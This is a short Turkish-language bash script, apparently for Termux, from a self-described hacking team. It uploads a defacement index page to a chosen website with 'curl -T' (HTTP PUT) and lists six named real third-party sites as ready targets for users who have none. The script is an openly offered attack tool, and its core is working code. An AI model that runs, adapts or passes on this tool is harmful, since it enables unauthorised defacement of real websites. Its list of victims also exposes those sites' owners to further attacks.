

#lu recode gua sumpahin melarat#

clear
sleep 1
echo "[+] Bekle Dostum..." | lolcat
sleep 3
clear
figlet Hosgeldin | lolcat
sleep 2
clear
echo "_______________________________________________________

                 [Adresler ve Araclar ]

[+] Kodlayıcı : GUL5OY
[+] Takım    : BLURY HACK TIM
[+] Github  : https://github.com/gul5oy
[+] Iletisim : gul5oy@yandex.com
[+] Instagram : www.instagram.com/gul5oy

_______________________________________________________" | lolcat
sleep 1
echo "[+] Bekleyin Server'a Baglanılıyor..." | lolcat
sleep 3
echo "[+] Hedef Siteniz Yok Ise Buradan Kullanabilirsiniz." | lolcat
sleep 2
echo "_____________________________________

﻿http://africaprop.co.za/

 http://ballastbrokers.co.za/

 http://www.ajaxfilebrowser.com/

 http://hq.prospec.co.th/

 http://branch.prospec.co.th/

 http://bestilling.udir.no
_____________________________________" | lolcat

echo "[+] Hedef Website : " $target |lolcat
read target
echo "[+]Bekle..." | lolcat
sleep 2
echo "[+] Index'in kayıtlı oldugu isim? : " $sc |lolcat
read sc
curl -T /storage/emulated/0/$sc $target
echo "[+] Hedef siteyi kontrol et .html" | lolcat
sleep 2
echo "[+] Basarılı!! " | lolcat
sleep 20
clear
echo "Instagram hesabımdan bana ulasabilirsiniz." | lolcat
sleep 5
clear
